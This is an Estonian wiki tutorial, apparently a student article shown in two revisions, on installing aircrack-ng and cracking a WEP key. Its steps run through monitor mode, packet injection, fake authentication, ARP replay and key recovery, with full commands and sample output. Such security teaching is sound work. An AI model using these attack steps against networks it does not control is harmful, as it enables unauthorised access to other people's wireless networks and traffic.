Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja: &lt;br /&gt;
* Arvuti MAC aadress, mis jooksutab aircrack-ng&#039;d: 00:0F:B5:88:AC:82&lt;br /&gt;
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80&lt;br /&gt;
* ESSID (võrgu nimi): teddy&lt;br /&gt;
* Pääsupunkti kanal: 9&lt;br /&gt;
* Raadiovõrgu liides (ingl. k Wireless interface): ath0&lt;br /&gt;
&lt;br /&gt;
==Eesmärk==&lt;br /&gt;
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
==Lühikesed tegevussammud==&lt;br /&gt;
Lühidalt sammudest, mida tegema asume:&lt;br /&gt;
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)&amp;lt;br&amp;gt;&lt;br /&gt;
2. Testime „süstimise“ suutlikkust pääsupunktile &amp;lt;br&amp;gt;&lt;br /&gt;
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
4. Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga &amp;lt;br&amp;gt;&lt;br /&gt;
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette&amp;lt;br&amp;gt;&lt;br /&gt;
6. Kasutada aircrack-ng&#039;d salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Näide WEP võtme lahti murdmise protsessist==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.&lt;br /&gt;
 &lt;br /&gt;
Peata ath0 liidese:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng stop ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;Interface       Chipset         Driver&lt;br /&gt;
&lt;br /&gt;
wifi0           Atheros         madwifi-ng&lt;br /&gt;
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli, kas kõik athX liidesed on ikka suletud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval &#039;&#039;&#039;airmon-ng stop athX&#039;&#039;&#039; käsuga sulgeda.&lt;br /&gt;
&lt;br /&gt;
Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wifi0 9&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pane tähele! Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav airmon-ng stop ath0 käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raaiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt; Interface       Chipset         Driver&lt;br /&gt;
 &lt;br /&gt;
 wifi0           Atheros         madwifi-ng&lt;br /&gt;
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pane tähele! “ath0” liides on märgitud nüüd kuulamisrežiimi.&lt;br /&gt;
&lt;br /&gt;
Veendumaks, et liides on korrektselt üles seatud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
ath0      IEEE 802.11g  ESSID:&amp;quot;&amp;quot;  Nickname:&amp;quot;&amp;quot;&lt;br /&gt;
       Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   &lt;br /&gt;
       Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  &lt;br /&gt;
       Retry:off   RTS thr:off   Fragment thr:off&lt;br /&gt;
       Encryption key:off&lt;br /&gt;
       Power Management:off&lt;br /&gt;
       Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm&lt;br /&gt;
       Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
       Tx excessive retries:0  Invalid misc:0   Missed beacon:0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli: Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng&#039;d jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!&lt;br /&gt;
&#039;&#039;&#039;&lt;br /&gt;
Samm 2: Testime „süstimise“ suutlikkust pääsupunktile&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.&lt;br /&gt;
 &lt;br /&gt;
Sisesta käsureale:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&lt;br /&gt;
-9 - “süstimise” test&lt;br /&gt;
-e teddy – raadiovõrgu nimi&lt;br /&gt;
-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress&lt;br /&gt;
ath0 – raadiovõrgu liides&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
09:23:35  Trying broadcast probe requests...&lt;br /&gt;
09:23:35  Injection is working!&lt;br /&gt;
09:23:37  Found 1 AP &lt;br /&gt;
&lt;br /&gt;
09:23:37  Trying directed probe requests...&lt;br /&gt;
09:23:37  00:14:6C:7E:40:80 - channel: 9 - &#039;teddy&#039;&lt;br /&gt;
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73&lt;br /&gt;
09:23:39  30/30: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pane tähele! Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.  &lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm 3: Avada airodump-ng pakettide püüdmiseks&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta: &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&lt;br /&gt;
-c 9 – raadiovõrgu kanal&lt;br /&gt;
--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühendud&lt;br /&gt;
-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 &lt;br /&gt;
                                                                                                              &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 BSSID              STATION            PWR  Lost  Packets  Probes                                             &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  &amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;&lt;br /&gt;
Samm 4: Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&lt;br /&gt;
Selgitus:&lt;br /&gt;
-1 – võlts autentimine&lt;br /&gt;
0 – kordusühendus(t)e aeg sekundites&lt;br /&gt;
-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Õnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&lt;br /&gt;
Ebaõnnestumise korral on tulemus: &lt;br /&gt;
8:28:02  Sending Authentication Request&lt;br /&gt;
18:28:02  Authentication successful&lt;br /&gt;
18:28:02  Sending Association Request&lt;br /&gt;
18:28:02  Association successful :-)&lt;br /&gt;
18:28:02  Got a deauthentication packet!&lt;br /&gt;
18:28:05  Sending Authentication Request&lt;br /&gt;
18:28:05  Authentication successful&lt;br /&gt;
18:28:05  Sending Association Request&lt;br /&gt;
18:28:10  Sending Authentication Request&lt;br /&gt;
18:28:10  Authentication successful&lt;br /&gt;
18:28:10  Sending Association Request&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;&lt;br /&gt;
Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;Saving ARP requests in replay_arp-0321-191525.cap&lt;br /&gt;
You should also start airodump-ng to capture replies.&lt;br /&gt;
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm 6: Ava aircrack-ng salasõna lahti murdmiseks&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken: &lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng -b 00:14:6C:7E:40:80 output*.cap&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&lt;br /&gt;
Selgitus:&lt;br /&gt;
-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub&lt;br /&gt;
output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;                             [00:03:06] Tested 674449 keys (got 96610 IVs)&lt;br /&gt;
&lt;br /&gt;
KB    depth   byte(vote)&lt;br /&gt;
 0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) &lt;br /&gt;
 1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) &lt;br /&gt;
 2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) &lt;br /&gt;
 3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) &lt;br /&gt;
&lt;br /&gt;
                      KEY FOUND! [ 12:34:56:78:90 ] &lt;br /&gt;
     Probability: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Kokkuvõte=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Kasutatud kirjandus=&lt;br /&gt;
&amp;lt;references/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Autor(id)=&lt;br /&gt;
&lt;br /&gt;
Kelly Tragel [ISa 21]&lt;br /&gt;
Viimati muudetud: 25.05.2015&lt;br /&gt;
&lt;br /&gt;
=Versioonide ajalugu=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Kuupäev &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Versioon &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 25.05.2015 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 1.0 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;  &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;  &amp;lt;/td&amp;gt;         &lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;  &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;  &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ktragel</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89279</id>
		<title>Aircrack</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89279"/>
		<updated>2015-05-25T19:08:45Z</updated>

		<summary type="html">&lt;p&gt;Ktragel: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit. &lt;br /&gt;
&lt;br /&gt;
=Eeldused=&lt;br /&gt;
&lt;br /&gt;
* Elementaarne käsurea kasutamisoskus&lt;br /&gt;
* Teadmised WiFi, WEP, WPA/WPA2 kohta&lt;br /&gt;
* Võrgus vähemalt 1 aktiivne klient&lt;br /&gt;
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)&lt;br /&gt;
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)&lt;br /&gt;
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])&lt;br /&gt;
&lt;br /&gt;
WiFi adapteri vaatamine:&lt;br /&gt;
&amp;lt;pre&amp;gt;lspci -nn | grep Network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või rohkema informatsiooni saamiseks:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;lshw -class network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemuseks saame midagi sarnast:&lt;br /&gt;
&amp;lt;pre&amp;gt;02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;*-network&lt;br /&gt;
       description: Wireless interface&lt;br /&gt;
       product: Centrino Advanced-N 6205 [Taylor Peak]&lt;br /&gt;
       vendor: Intel Corporation&lt;br /&gt;
       physical id: 0&lt;br /&gt;
       bus info: pci@0000:02:00.0&lt;br /&gt;
       logical name: wlan0&lt;br /&gt;
       version: 34&lt;br /&gt;
       serial: 6c:88:14:1d:29:c4&lt;br /&gt;
       width: 64 bits&lt;br /&gt;
       clock: 33MHz&lt;br /&gt;
       capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless&lt;br /&gt;
       configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn&lt;br /&gt;
       resources: irq:32 memory:f7d00000-f7d01fff&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;&amp;lt;!-- Warning style viksitud ArchWikist --&amp;gt;div style=&amp;quot;padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;&amp;quot;&amp;gt;&#039;&#039;&#039;Pane tähele! &#039;&#039;&#039;Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone. &amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Üldkirjeldus=&lt;br /&gt;
&lt;br /&gt;
aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:&lt;br /&gt;
* airodump-ng - programm pakettide püüdmiseks &lt;br /&gt;
* aireplay-ng - programm pakettide „süstimiseks“ &lt;br /&gt;
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija&lt;br /&gt;
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks &lt;br /&gt;
&lt;br /&gt;
==Süntaks==&lt;br /&gt;
&lt;br /&gt;
aircrack-ng süntaks näeb välja järgmine:&lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng [võti] &amp;lt;püütud fail(id)&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&amp;amp;DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]&lt;br /&gt;
&lt;br /&gt;
=Installeerimine=&lt;br /&gt;
&lt;br /&gt;
Uuendame repositooriumi:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get update&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get install aircrack-ng&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=WEP võtme murdmine=&lt;br /&gt;
&lt;br /&gt;
Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja: &lt;br /&gt;
* Arvuti MAC aadress, mis jooksutab aircrack-ng&#039;d: 00:0F:B5:88:AC:82&lt;br /&gt;
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80&lt;br /&gt;
* ESSID (võrgu nimi): teddy&lt;br /&gt;
* Pääsupunkti kanal: 9&lt;br /&gt;
* Raadiovõrgu liides (ingl. k Wireless interface): ath0&lt;br /&gt;
&lt;br /&gt;
==Eesmärk==&lt;br /&gt;
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
==Lühikesed tegevussammud==&lt;br /&gt;
Lühidalt sammudest, mida tegema asume:&lt;br /&gt;
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)&amp;lt;br&amp;gt;&lt;br /&gt;
2. Testime „süstimise“ suutlikkust pääsupunktile &amp;lt;br&amp;gt;&lt;br /&gt;
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
4. Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga &amp;lt;br&amp;gt;&lt;br /&gt;
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette&amp;lt;br&amp;gt;&lt;br /&gt;
6. Kasutada aircrack-ng&#039;d salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Näide WEP võtme lahti murdmise protsessist==&lt;br /&gt;
&lt;br /&gt;
====Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi====&lt;br /&gt;
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.&lt;br /&gt;
 &lt;br /&gt;
Peata ath0 liidese:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng stop ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;Interface       Chipset         Driver&lt;br /&gt;
&lt;br /&gt;
wifi0           Atheros         madwifi-ng&lt;br /&gt;
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli, kas kõik athX liidesed on ikka suletud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval &#039;&#039;&#039;airmon-ng stop athX&#039;&#039;&#039; käsuga sulgeda.&lt;br /&gt;
&lt;br /&gt;
Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wifi0 9&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pane tähele! Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav airmon-ng stop ath0 käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raaiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt; Interface       Chipset         Driver&lt;br /&gt;
 &lt;br /&gt;
 wifi0           Atheros         madwifi-ng&lt;br /&gt;
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pane tähele! “ath0” liides on märgitud nüüd kuulamisrežiimi.&lt;br /&gt;
&lt;br /&gt;
Veendumaks, et liides on korrektselt üles seatud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
ath0      IEEE 802.11g  ESSID:&amp;quot;&amp;quot;  Nickname:&amp;quot;&amp;quot;&lt;br /&gt;
       Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   &lt;br /&gt;
       Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  &lt;br /&gt;
       Retry:off   RTS thr:off   Fragment thr:off&lt;br /&gt;
       Encryption key:off&lt;br /&gt;
       Power Management:off&lt;br /&gt;
       Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm&lt;br /&gt;
       Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
       Tx excessive retries:0  Invalid misc:0   Missed beacon:0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli: Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng&#039;d jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!&lt;br /&gt;
&lt;br /&gt;
====Testime „süstimise“ suutlikkust pääsupunktile====&lt;br /&gt;
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.&lt;br /&gt;
 &lt;br /&gt;
Sisesta käsureale:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&lt;br /&gt;
-9 - “süstimise” test&lt;br /&gt;
-e teddy – raadiovõrgu nimi&lt;br /&gt;
-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress&lt;br /&gt;
ath0 – raadiovõrgu liides&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
09:23:35  Trying broadcast probe requests...&lt;br /&gt;
09:23:35  Injection is working!&lt;br /&gt;
09:23:37  Found 1 AP &lt;br /&gt;
&lt;br /&gt;
09:23:37  Trying directed probe requests...&lt;br /&gt;
09:23:37  00:14:6C:7E:40:80 - channel: 9 - &#039;teddy&#039;&lt;br /&gt;
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73&lt;br /&gt;
09:23:39  30/30: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
